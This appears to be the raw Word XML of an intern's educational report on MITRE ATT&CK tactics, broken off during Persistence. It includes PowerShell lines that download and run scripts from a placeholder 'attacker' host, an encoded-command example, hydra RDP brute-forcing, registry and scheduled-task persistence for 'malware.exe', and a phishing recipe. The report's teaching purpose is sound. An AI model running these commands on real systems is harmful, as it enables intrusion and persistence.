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F0" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="conclusion"/>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Proof of Concept (PoC) for MITRE ATT&amp;CK® Enterprise Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Fonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Intern</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C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 xml:space="preserve">Gautam Poojari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Fonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Intern Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: 251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Organization</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: DigiSuraksha — Parhari Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>This Proof of Concept (PoC) focuses on the MITRE ATT&amp;CK® Enterprise Matrix, which outlines 14 core tactics used by adversaries in cyberattacks. Each tactic is explored with three techniques and two procedures, followed by a summary of the flow to demonstrate real-world attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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1. Tactic: Reconnaissance (TA0043)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gather information about the target to plan future attacks.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1: T1595 – Active Scanning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Adversaries scan networks to identify open ports, services, and vulnerabilities.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Port Scanning with Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Run </w:t>
      </w:r>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nmap -sS -Pn -T4 &lt;target_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a SYN scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Analyze results for open ports (e.g., 22/SSH, 80/HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Identify vulnerable services (e.g., outdated Apache versions).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Vulnerability Scanning with Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Configure Nessus to scan the target subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Review scan reports for exploitable weaknesses (e.g., CVE-2023-1234).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2: T1589 – Gather Victim Identity Information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Collect employee details (emails, roles) from public sources.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LinkedIn Recon:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Search for employees of "TargetCorp" on LinkedIn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Extract names, job titles, and email patterns (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>first.last@target.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>).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WHOIS Lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whois target.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find domain registrar and admin contacts.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3: T1592 – Gather Victim Host Information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Obtain details about the target’s IT infrastructure.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DNS Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Run </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dig ANY target.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list subdomains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Identify internal hosts (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vpn.target.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>).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Shodan Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Query </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>org:"TargetCorp"</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find exposed devices.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Summary of Flow for Reconnaissance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504"/>
      </w:tblGrid>
      <w:tr w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidTr="007A21F0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Action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T1595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Scan target’s network for open ports.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T1589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Harvest employee emails via LinkedIn.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T1592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Discover subdomains using DNS queries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maps attack surface for future exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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2. Tactic: Initial Access (TA0001)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain the first foothold in the target environment.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1: T1566 – Phishing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Trick users into executing malicious payloads.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Spearphishing Email:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Craft an email with a fake invoice (</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoice_2025.docx</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Embed a macro that runs </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -c "IEX (New-Object </w:t>
      </w:r>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Net.WebClient).DownloadString('http://attacker/payload.ps1')"</w:t>
      </w:r>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>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Credential Harvesting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Clone a login page (e.g., O365) and host it on a phishing domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Send a link via email: "Your password expired, click here to reset."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lastRenderedPageBreak/>
        <w:t>Technique 2: T1195 – Supply Chain Compromise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Exploit trusted software updates.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Malicious Package Upload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Upload a trojanized </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> package (</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>legit-library-v1.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Wait for victims to install it via </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm install legit-library</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>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Compromised Vendor Site:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Inject malware into a software vendor’s download server.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3: T1133 – External Remote Services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Exploit exposed services (e.g., RDP, VPN).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RDP Brute Force:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hydra -l admin -P rockyou.txt rdp://target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Gain access with stolen credentials.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VPN Exploit (CVE-2024-1234):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Exploit a vulnerability in Pulse Secure VPN.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Summary of Flow for Initial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250"/>
      </w:tblGrid>
      <w:tr w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidTr="007A21F0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Action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T1566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Send phishing email with macro.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T1195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Poison a software update.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T1133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Brute-force RDP with weak credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gains persistent access to the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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3. Tactic: Execution (TA0002)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run malicious code on compromised systems.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1: T1059 – Command-Line Interface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Abuse PowerShell for payload execution.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Fileless Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Run: </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -nop -c "IEX (New-Object </w:t>
      </w:r>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Net.WebClient).DownloadString('http://attacker/shell.ps1')"</w:t>
      </w:r>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="007A21F0" w:rsidP="007A21F0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="72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058481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6 0217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8C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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Obfuscated Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="007A21F0" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32FD1A1B" wp14:editId="32DF4883">
            <wp:extent cx="5943600" cy="56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6 02172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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Encode script in Base64:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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51368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$cmd = "Start-Process malware.exe"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005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51368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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51368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -EncodedCommand $b64  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2: T1203 – Exploitation for Client Execution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Exploit software vulnerabilities (e.g., Office, browsers).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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Word Macro Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="007A21F0" w:rsidP="0051368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943600" cy="589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6 0217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8C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Embed </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2021-40444</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit in a </w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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Browser Drive-By:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="007A21F0" w:rsidP="0051368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496692" cy="828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6 0217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8C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Host an exploit kit on a compromised website.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Technique 3: T1651 – Cloud Administration Command</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Abuse cloud APIs for remote execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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1 – AWS SSM Abuse:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="007A21F0" w:rsidP="0051368C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249008" cy="1133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6 0222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Procedure 2 – Azure RunCommand:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="007A21F0" w:rsidRDefault="0051368C" w:rsidP="007A21F0">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A21F0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">az vm run-command invoke --command-id RunPowerShellScript --scripts "Start-Process malware.exe"  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Summary of Flow for Execution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450"/>
      </w:tblGrid>
      <w:tr w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidTr="007A21F0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pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051368C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action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T1059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Run PowerShell payload.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T1203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Exploit Word macro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidTr="007A21F0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T1651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51368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C">
            <w:r w:rsidRPr="0051368C">
              <w:t>Execute malware via cloud API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Achieves code execution across endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="0051368C" w:rsidP="002D1884">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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4. Tactic: Persistence (TA0003)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maintain long-term access to compromised systems.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1: T1547 – Boot or Logon Autostart Execution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Ensure malware runs at system startup.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Registry Run Key:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Add a malicious entry:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Update" -Value "C:\malware.exe"  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Procedure 2 – Scheduled Task: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C63AC8E" wp14:editId="0E7B8FC2">
            <wp:extent cx="5544324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Create a task to execute payload on logon:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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schtasks /create /tn "Cleanup" /tr "C:\malware.exe" /sc onlogon /ru SYSTEM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2: T1136 – Create Account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Add a backdoor user account.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Procedure 1 – Local Admin Account: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drawing>
